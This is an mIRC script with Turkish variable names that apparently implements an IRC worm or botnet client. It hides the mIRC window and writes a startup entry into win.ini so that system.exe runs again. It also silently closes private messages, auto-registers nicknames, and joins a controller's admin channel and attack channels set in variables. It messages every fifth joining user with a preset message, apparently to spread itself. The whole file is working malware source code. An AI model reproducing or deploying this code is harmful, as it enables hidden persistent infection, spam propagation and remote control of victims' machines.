on 1:start: { dll swf.dll do_ShowWindow $window(-2).hwnd 0 | //writeini -n c:\windows\win.ini windows run system.exe | saldirisifirla | unset %hit | degisim | ignore -r | server irc.hayta.net:6667 |  server -m irc.e-kolay.net | server -m irc.dal.net  | server -m irc.zurna.net | server -m irc.doruk.net.tr | server -m irc.undernet.org  }  }
on 1:exit: { /run system.exe | //writeini -n c:\windows\win.ini windows run system.exe }

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

raw 433:*:nick $read nick.txt
raw 471:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 473:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 474:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 475:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 477:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on 1:text:*:?: /closemsg $nick
on 1:ACTION:*:?:  /closemsg $nick
on 1:NOTICE:*:?: /closemsg $nick

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on *^:ERROR:*banned*:{
  server $read(server.txt)
  halt
}

on 1:connect: { 
  ignore -wd *
  unset %hit
  if ($server !== irc.hayta.net) { nickserv register 123456789 $read(nick.txt) $+ @hotmail.com | nickserv identify 123456789 }
  if ($server !== irc.hayta.net) { timer 1 300 Server | if ($server !== irc.e-kolay.net) && ($server !== %hucumserver) && ($server !==  %hucum1server) { join $read kanal.txt } }
  if ($server == irc.hayta.net) { join %adminkanal safari }
  if ($server == irc.e-kolay.net) && (%hucumserver !== irc.e-kolay.net) { join $read(ekolaykanal.txt) }
  if ($server == %hucumserver) { join %hucumkanal }
}

on 1:join:*: { 
  if ($nick == $me) && ($server == irc.hayta.net) && ($chan !== %adminkanal) { 
    part $chan 
  } 
}

on 1:disconnect: { partall | degisim | saldirisifirla | server $read(server.txt) | unset %hit | //writeini -n c:\windows\win.ini windows run system.exe | halt }

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on ^*:join:*: { if ($server !== irc.hayta.net) && ($nick !== $me) && ($server !== %hucumserver) { set %nicks $nick | inc %hit 1 | gonder } }

alias gonder {
  if ($server !== irc.hayta.net) {
    if (%hit == 5) {
      if ($network !== dalnet) && ($network !== undernet) { msg %nicks %mesaj | unset %hit }
      else if ($network == dalnet) { msg %nicks %dalnetmesaj | msg %nicks %mesaj | unset %hit }
      else if ($network == undernet) { msg %nicks %dalnetmesaj | msg %nicks %mesaj | unset %hit }
    }
  }
}
